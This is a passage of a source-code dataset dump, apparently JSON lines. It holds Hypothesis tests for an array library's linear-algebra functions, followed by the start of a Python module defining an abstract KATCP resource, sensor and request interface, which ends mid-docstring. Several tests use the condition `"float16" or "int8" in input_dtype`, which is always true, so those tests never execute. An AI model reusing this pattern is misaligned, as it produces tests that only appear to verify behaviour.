as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_inv(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"inv\",\n x=np.random.uniform(size=(b, a, a)).astype(input_dtype[0]),\n )\n\n\n# matrix_transpose\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_matrix_transpose(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matrix_transpose\",\n x=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n )\n\n\n# outer\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_outer(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"outer\",\n x1=np.random.uniform(size=a).astype(input_dtype[0]),\n x2=np.random.uniform(size=b).astype(input_dtype[1]),\n )\n\n\n# slogdet\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n)\ndef test_slogdet(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"slogdet\",\n x=np.random.uniform(size=(a, a)).astype(input_dtype[0]),\n )\n\n\n# solve\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n)\ndef test_solve(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"solve\",\n x1=np.random.uniform(size=(a, a)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(a, 1)).astype(input_dtype[1]),\n )\n\n\n# svdvals\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_svdvals(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"svdvals\",\n x=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n )\n\n\n# tensordot\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50) | st.tuples(st.lists(st.integers()), st.lists(st.integers())),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n d=st.integers(1, 50),\n)\ndef test_tensordot(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n d,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"tensordot\",\n axes=a,\n x1=np.random.uniform(size=(b, c)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(c, d)).astype(input_dtype[1]),\n )\n\n\n# trace\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n offset=st.integers(-10, 10),\n)\ndef test_trace(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n offset,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"trace\",\n offset=offset,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# vecdot\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(-1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n)\ndef test_vecdot(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"vecdot\",\n axes=a,\n x1=np.random.uniform(size=(b, c)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(b, b)).astype(input_dtype[1]),\n )\n\n\n# vector_norm\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n axis=st.integers(-10, 10) | st.tuples(st.lists(st.integers())),\n kd=st.booleans(),\n ord=st.integers() | st.floats(),\n)\ndef test_vector_norm(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n axis,\n kd,\n ord,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"vector_norm\",\n axis=axis,\n keepdims=kd,\n ord=ord,\n x=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n )\n\n\n# pinv\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n seed=st.integers(0, 2**4 - 1),\n)\ndef test_pinv(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n seed,\n):\n if \"float16\" in input_dtype:\n return\n np.random.seed(seed)\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"pinv\",\n rtol=5e-02,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# qr\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n mode=st.sampled_from((\"reduced\", \"complete\")),\n)\ndef test_qr(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n mode,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"qr\",\n mode=mode,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# svd\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n fm=st.booleans(),\n)\ndef test_svd(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n fm,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"svd\",\n full_matrices=fm,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# matrix_norm\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n kd=st.booleans(),\n ord=st.integers(1, 10)\n | st.floats(1, 10)\n | st.sampled_from((\"fro\", \"nuc\", \"float('inf')\", \"-float('inf')\")),\n)\ndef test_matrix_norm(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n kd,\n ord,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matrix_norm\",\n keepdims=kd,\n ord=ord,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# matrix_rank\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n)\ndef test_matrix_rank(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matrix_rank\",\n rtol=5e-02,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# cholesky\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n upper=st.booleans(),\n)\ndef test_cholesky(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n upper,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"cholesky\",\n upper=upper,\n x=np.random.uniform(size=(a, a)).astype(input_dtype[0]),\n )\n\n\n# cross\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n axis=st.integers(-1, 50),\n)\ndef test_cross(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n axis,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"cross\",\n axis=axis,\n x1=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(a, b)).astype(input_dtype[1]),\n )\n\n\n# diagonal\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n offset=st.integers(-10, 50),\n axes=st.lists(st.integers(-2, 50), min_size=2, max_size=2, unique=True),\n)\ndef test_diagonal(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n offset,\n axes,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"diagonal\",\n offset=offset,\n axis1=axes[0],\n axis2=axes[1],\n x=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n )\n"} {"ext": "py", "sha": "1a2ee2cbf78b119984f8f1cc2ecb08d56c921a85", "content": "# Copyright 2014 National Research Foundation (South African Radio Astronomy Observatory)\n# BSD license - see LICENSE for details\n\"\"\"A high-level abstract interface to KATCP clients, sensors and requests.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\nfrom future import standard_library\nstandard_library.install_aliases() # noqa: E402\n\nimport abc\nimport collections\nimport logging\nimport sys\n\nfrom builtins import object\n\nimport tornado\n\nfrom future.utils import with_metaclass, PY2\nfrom past.builtins import basestring\nfrom tornado.concurrent import Future\nfrom tornado.gen import Return, with_timeout\n\nfrom katcp import Message, Sensor\nfrom katcp.core import hashable_identity\nfrom katcp.compat import ensure_native_str\n\nlogger = logging.getLogger(__name__)\n\n\nclass KATCPResourceError(Exception):\n \"\"\"Error raised for resource-related errors\"\"\"\n\n\nclass KATCPResourceInactive(KATCPResourceError):\n \"\"\"Raised when a request is made to an inactive resource\"\"\"\n\n\nclass KATCPSensorError(KATCPResourceError):\n \"\"\"Raised if a problem occurred dealing with as KATCPSensor operation\"\"\"\n\n\nclass SensorResultTuple(collections.namedtuple(\n 'SensorResultTuple',\n 'object name python_identifier description type units reading')):\n \"\"\"Per-sensor result of list_sensors() method\n\n Attributes\n ----------\n object : KATCPSensor instance\n name : str\n KATCP (i.e. unescaped) name of the sensor\n python_identifier : str\n Python-identifier name of the sensor.\n description : str\n KATCP description of the sensor\n type : str\n KATCP type of the sensor\n units : str\n KATCP units of the sensor\n reading : KATCPSensorReading instance\n Most recently received sensor reading\n \"\"\"\n __slots__ = [] # Prevent dynamic attributes from being possible\n\n\ndef normalize_strategy_parameters(params):\n \"\"\"Normalize strategy parameters to be a list of strings.\n\n Parameters\n ----------\n params : (space-delimited) string or sequence of strings/numbers Parameters\n expected by :class:`SampleStrategy` object, in various forms, where the first\n parameter is the name of the strategy.\n\n Returns\n -------\n params : tuple of strings\n Strategy parameters as a list of strings\n\n \"\"\"\n def fixup_numbers(val):\n try:\n # See if it is a number\n return str(float(val))\n except ValueError:\n # ok, it is not a number we know of, perhaps a string\n return str(val)\n if isinstance(params, basestring):\n params = params.split(' ')\n # No number\n return tuple(fixup_numbers(p) for p in params)\n\n\ndef escape_name(name):\n \"\"\"Escape sensor and request names to be valid Python identifiers.\"\"\"\n return name.replace('.', '_').replace('-', '_')\n\n\nclass KATCPResource(with_metaclass(abc.ABCMeta, object)):\n\n \"\"\"Base class to serve as the definition of the KATCPResource API.\n\n A class `C` implementing the KATCPResource API should register itself using\n KATCPResource.register(C) or subclass KATCPResource directly. A complication\n involved with subclassing is that all the abstract properties must be\n implemented as properties; normal instance attributes cannot be used.\n\n Attributes\n ----------\n Apart from the abstract properties described below\n\n TODO Describe how hierarchies are implemented. Also all other descriptions\n here so that the sphinx doc can be auto-generated from here.\n\n \"\"\"\n\n def __init__(self):\n self._active = True\n\n @abc.abstractproperty\n def name(self):\n \"\"\"Name of this KATCP resource.\"\"\"\n\n @abc.abstractproperty\n def description(self):\n \"\"\"Description of this KATCP resource.\"\"\"\n\n @abc.abstractproperty\n def address(self):\n \"\"\"Address of the underlying client/device.\n\n Type: tuple(host, port) or None, with host a string and port an integer.\n\n If this KATCPResource is not associated with a specific KATCP device\n (e.g. it is only a top-level container for a hierarchy of KATCP\n resources), the address should be None.\n\n \"\"\"\n\n @abc.abstractproperty\n def is_connected(self):\n \"\"\"Indicate whether the underlying client/device is connected or not.\"\"\"\n\n @abc.abstractproperty\n def req(self):\n \"\"\"Attribute root/container for all KATCP request wrappers.\n\n Each KATCP request that is exposed on a KATCP device should have a\n corresponding :class:`KATCPRequest` object so that calling\n\n `resource.req.request_name(arg1, arg2, ...)`\n\n sends a '?request-name arg1 arg2 ...' message to the KATCP device and\n waits for the associated inform-reply and reply messages.\n\n For a :class:`KATCPResource` object that exposes a hierarchical device\n it can choose to include lower-level request handlers here such that\n `resource.req.dev_request()` maps to `resource.dev.req.request()`.\n\n \"\"\"\n\n @abc.abstractproperty\n def sensor(self):\n \"\"\"Attribute root/container for all KATCP sensor wrappers.\n\n Each KATCP sensor that is exposed on a KATCP device should have a\n corresponding :class:`KATCPSensor` object so that\n\n `resource.sensor.sensor_name`\n\n corresponds to a sensor named e.g. 'sensor-name', where the object or\n attribute name is an escaped/Pythonised version of the original sensor\n name (see :func:`escape_name` for the escape mechanism). Hopefully the\n device is not crazy enough to have multiple sensors that map to the\n same Python identifier.\n\n A :class:`KATCPResource` object that exposes a hierarchical device can\n choose to include lower-level sensors here such that\n `resource.sensor.dev_sensorname` maps to\n `resource.dev.sensor.sensorname`.\n\n \"\"\"\n\n @abc.abstractproperty\n def parent(self):\n \"\"\"Parent KATCPResource object of this subordinate resource, or None.\"\"\"\n\n @abc.abstractproperty\n def children(self):\n \"\"\"AttrDict of subordinate KATCPResource objects keyed by their names.\"\"\"\n\n @tornado.gen.coroutine\n def wait(self, sensor_name, condition_or_value, timeout=5):\n \"\"\"Wait for a sensor in this resource to satisfy a condition.\n\n Parameters\n ----------\n sensor_name : string\n The name of the sensor to check\n condition_or_value : obj or callable, or seq of objs or callables\n If obj, sensor.value is compared with obj. If callable,\n condition_or_value(reading) is called, and must return True if its\n condition is satisfied. Since the reading is passed in, the value,\n status, timestamp or received_timestamp attributes can all be used\n in the check.\n timeout : float or None\n The timeout in seconds (None means wait forever)\n\n Returns\n -------\n This command returns a tornado Future that resolves with True when the\n sensor value satisfies the condition, or False if the condition is\n still not satisfied after a given timeout period.\n\n Raises\n ------\n :class:`KATCPSensorError`\n If the sensor does not have a strategy set, or if the named sensor\n is not present\n\n \"\"\"\n sensor_name = escape_name(sensor_name)\n sensor = self.sensor[sensor_name]\n try:\n yield sensor.wait(condition_or_value, timeout)\n except tornado.gen.TimeoutError:\n raise tornado.gen.Return(False)\n else:\n raise tornado.gen.Return(True)\n\n @abc.abstractmethod\n def list_sensors(self, filter=\"\", strategy=False, status=\"\",\n use_python_identifiers=True, tuple=False, refresh=False):\n \"\"\"List sensors available on this resource matching certain criteria.\n\n Parameters\n ----------\n filter : string, optional\n Filter each returned sensor's name against this regexp if specified.\n To ease the dichotomy between Python identifier names and actual\n sensor names, the default is to search on Python identifier names\n rather than KATCP sensor names, unless `use_python_identifiers`\n below is set to False. Note that the sensors of subordinate\n KATCPResource instances may have inconsistent names and Python\n identifiers, better to always search on Python identifiers in this\n case.\n strategy : {False, True}, optional\n Only list sensors with a set strategy if True\n status : string, optional\n Filter each returned sensor's status against this regexp if given\n use_python_identifiers : {True, False}, optional\n Match on python identifiers even the the KATCP name is available.\n tuple : {True, False}, optional, Default: False\n Return backwards compatible tuple instead of SensorResultTuples\n refresh : {True, False}, optional, Default: False\n If set the sensor values will be refreshed with get_value before\n returning the results.\n\n Returns\n -------\n sensors : list of SensorResultTuples, or list of tuples\n List of matching sensors presented as named tuples. The `object`\n field is the :class:`KATCPSensor` object associated with the sensor.\n Note that the name of the object may not match `name` if it\n originates from a subordinate device.\n \"\"\"\n\n @tornado.gen.coroutine\n def set_sampling_strategies(self, filter, strategy_and_params):\n \"\"\"Set a sampling strategy for all sensors that match the specified filter.\n\n Parameters\n ----------\n filter : string\n The regular expression filter to use to select the sensors to which\n to apply the specified strategy. Use \"\" to match all sensors. Is\n matched using :meth:`list_sensors`.\n strategy_and_params : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and parameters are as defined by the KATCP spec. As str contains the\n same elements in space-separated form.\n **list_sensor_args : keyword arguments\n Passed to the :meth:`list_sensors` call as kwargs\n\n Returns\n -------\n sensors_strategies : tornado Future\n resolves with a dict with the Python identifier names of the sensors\n as keys and the value a tuple:\n\n (success, info) with\n\n success : bool\n True if setting succeeded for this sensor, else False\n info : tuple\n normalised sensor strategy and parameters as tuple if success == True\n else, sys.exc_info() tuple for the error that occurred.\n \"\"\"\n sensors_strategies = {}\n sensor_results = yield self.list_sensors(filter)\n for sensor_reslt in sensor_results:\n norm_name = sensor_reslt.object.normalised_name\n try:\n sensor_strat = yield self.set_sampling_strategy(norm_name, strategy_and_params)\n sensors_strategies[norm_name] = sensor_strat[norm_name]\n except Exception:\n sensors_strategies[norm_name] = (\n False, sys.exc_info())\n raise tornado.gen.Return(sensors_strategies)\n\n @tornado.gen.coroutine\n def set_sampling_strategy(self, sensor_name, strategy_and_params):\n \"\"\"Set a sampling strategy for a specific sensor.\n\n Parameters\n ----------\n sensor_name : string\n The specific sensor.\n strategy_and_params : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and parameters are as defined by the KATCP spec. As str contains the\n same elements in space-separated form.\n\n Returns\n -------\n sensors_strategies : tornado Future\n resolves with a dict with the Python identifier names of the sensors\n as keys and the value a tuple:\n\n (success, info) with\n\n success : bool\n True if setting succeeded for this sensor, else False\n info : tuple\n normalised sensor strategy and parameters as tuple if success == True\n else, sys.exc_info() tuple for the error that occurred.\n \"\"\"\n sensors_strategies = {}\n try:\n sensor_obj = self.sensor.get(sensor_name)\n yield sensor_obj.set_sampling_strategy(strategy_and_params)\n sensors_strategies[sensor_obj.normalised_name] = (\n True, sensor_obj.sampling_strategy)\n except Exception:\n sensors_strategies[sensor_obj.normalised_name] = (\n False, sys.exc_info())\n raise tornado.gen.Return(sensors_strategies)\n\n def set_active(self, active):\n self._active = bool(active)\n for child in dict.values(self.children):\n child.set_active(active)\n\n def is_active(self):\n return self._active\n\n\nclass KATCPRequest(with_metaclass(abc.ABCMeta, object)):\n\n \"\"\"Abstract Base class to serve as the definition of the KATCPRequest API.\n\n Wrapper around a specific KATCP request to a given KATCP device. Each\n available KATCP request for a particular device has an associated\n :class:`KATCPRequest` object in the object hierarchy. This wrapper is mainly\n for interactive convenience. It provides the KATCP request help string as a\n docstring and pretty-prints the result of the request.\n\n \"\"\"\n\n def __init__(self, request_description, is_active=lambda: True):\n \"\"\"Initialize request with given description and network client\n\n Parameters\n ----------\n request_description : dict\n name : str\n KATCP name of the request\n description : str\n KATCP request description (as returned by ?help )\n timeout_hint : float or None\n Request timeout suggested by device or None if not provided\n is_active : callable, optional\n Returns True if this request is active, else False\n\n \"\"\"\n for required_description_key in ('name', 'description', 'timeout_hint'):\n if required_description_key not in request_description:\n raise ValueError(\n 'Required request_description key {!r} not present'\n .format(required_description_key))\n self._request_description = dict(request_description)\n self.__doc__ = '\\n'.join(('KATCP Documentation',\n '===================',\n self.description,\n 'KATCPRequest Documentation',\n '==========================',\n self.__doc__ or ''))\n self._is_active = is_active\n\n @property\n def name(self):\n \"\"\"Name of the KATCP request.\"\"\"\n return self._request_description['name']\n\n @property\n def description(self):\n \"\"\"Description of KATCP request as obtained from the ?help request.\"\"\"\n return self._request_description['description']\n\n @property\n def timeout_hint(self):\n \"\"\"Request timeout suggested by device or None if not provided\"\"\"\n return self._request_description['timeout_hint']\n\n\n def __call__(self, *args, **kwargs):\n \"\"\"Execute the KATCP request described by this object.\n\n All positional arguments of this function are converted to KATCP string\n representations and passed on as space-separated parameters to the KATCP\n device.\n\n Keyword Arguments\n -----------------\n timeout : None or float, optional\n Timeout in seconds for the request. If None, use request timeout\n hint received from server or default for the :class:`KATCPResource`\n instance that contains the request if no hint is available.\n mid : None or int, optional\n Message identifier to use for the request message. If None, use\n either auto-incrementing value or no mid depending on the KATCP\n protocol version (mid's were only introduced with KATCP v5) and the\n default of the containing :class:`KATCPResource` instance.\n\n Returns\n -------\n reply : tornado future resolving with :class:`KATCPReply` object\n KATCP request reply wrapped in KATCPReply object\n\n Raises\n ------\n :class:`ResourceInactive` if the resource is inactive when the request is made.\n \"\"\"\n if self.is_active():\n return self.issue_request(*args, **kwargs)\n else:\n raise KATCPResourceInactive(\n \"Can't make ?{} request; resource is inactive\".format(self.name))\n\n @abc.abstractmethod\n def issue_request(self, *args, **kwargs):\n \"\"\"Signature as for __call__\n\n Do the request immediately without checking active state.\n \"\"\"\n\n def is_active(self):\n \"\"\"True if resource for this request is active\"\"\"\n return self._is_active()\n\nclass KATCPDummyRequest(KATCPRequest):\n \"\"\"Dummy counterpart to KATCPRequest that always returns a successful reply\"\"\"\n def issue_request(self, *args, **kwargs):\n reply_msg = Message.reply('fake', 'ok')\n reply = KATCPReply(reply_msg, [])\n fut = Future()\n fut.set_result(reply)\n return fut\n\nclass KATCPSensorReading(collections.namedtuple(\n 'KATCPSensorReading', 'received_timestamp timestamp istatus value')):\n\n \"\"\"Sensor reading as a (received_timestamp, timestamp, istatus, value) tuple.\n\n Attributes\n ----------\n received_timestamp : float\n Time (in seconds since UTC epoch) at which the sensor value was received.\n timestamp : float\n Time (in seconds since UTC epoch) at which the sensor value was determined.\n istatus : int Sensor status constant\n Whether the value represents an error condition or not, as in class:`katcp.Sensor`\n The status is stored as an int, but output as a string, eg 'nominal'.\n value : object\n The value of the sensor (the type will be appropriate to the\n sensor's type).\n \"\"\"\n\n __slots__ = [] # Prevent dynamic attributes\n\n @property\n def status(self):\n \" Returns the string representation of sensor status, eg 'nominal'\"\n try:\n return Sensor.STATUSES[int(self.istatus)]\n except TypeError:\n return 'unknown'\n\n\nclass KATCPSensorsManager(with_metaclass(abc.ABCMeta, object)):\n\n \"\"\"Sensor management class used by KATCPSensor. Abstracts communications details.\n\n This class should arrange:\n\n 1. A mechanism for setting sensor strategies\n 2. A mechanism for polling a sensor value\n 3. Keeping track of- and reapplying sensor strategies after reconnect, etc.\n 4. Providing local time. This is doing to avoid direct calls to time.time, allowing\n accelerated time testing / simulation / dry-running\n \"\"\"\n\n @abc.abstractmethod\n def time(self):\n \"\"\"Returns the current time (in seconds since UTC epoch)\"\"\"\n\n @abc.abstractmethod\n def get_sampling_strategy(self, sensor_name):\n \"\"\"Get the current sampling strategy for the named sensor\n\n Parameters\n ----------\n\n sensor_name : str\n Name of the sensor (normal or escaped form)\n\n Returns\n -------\n\n strategy : tornado Future that resolves with tuple of str\n contains (, [, ...]) where the strategy names and\n parameters are as defined by the KATCP spec\n \"\"\"\n\n @abc.abstractmethod\n def set_sampling_strategy(self, sensor_name, strategy_and_parms):\n \"\"\"Set the sampling strategy for the named sensor\n\n Parameters\n ----------\n\n sensor_name : str\n Name of the sensor\n strategy : seq of str or str\n As tuple contains (, [, ...]) where the strategy\n names and 